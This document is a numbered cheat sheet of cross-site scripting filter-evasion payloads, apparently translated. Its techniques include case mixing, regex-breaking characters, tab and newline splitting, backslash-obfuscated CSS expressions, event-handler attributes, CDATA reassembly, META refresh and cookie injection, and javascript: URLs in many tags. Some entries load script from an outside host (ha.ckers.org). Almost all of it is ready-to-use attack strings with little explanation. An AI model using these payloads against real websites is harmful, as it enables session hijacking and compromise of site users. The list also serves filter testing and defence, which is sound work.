1. Change the case of characters

<sCript>alert('d')</scRipT>
2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use another file extension instead of .js

<script src="bad.jpg"></script>
4. Put the JavaScript inside a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url('javascript:alert("XSS");')
}
5. Insert other characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or newline to evade

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab
-> new line
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. Script in an HTML tag (event-handler attributes)

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in an SWF file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. JavaScript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>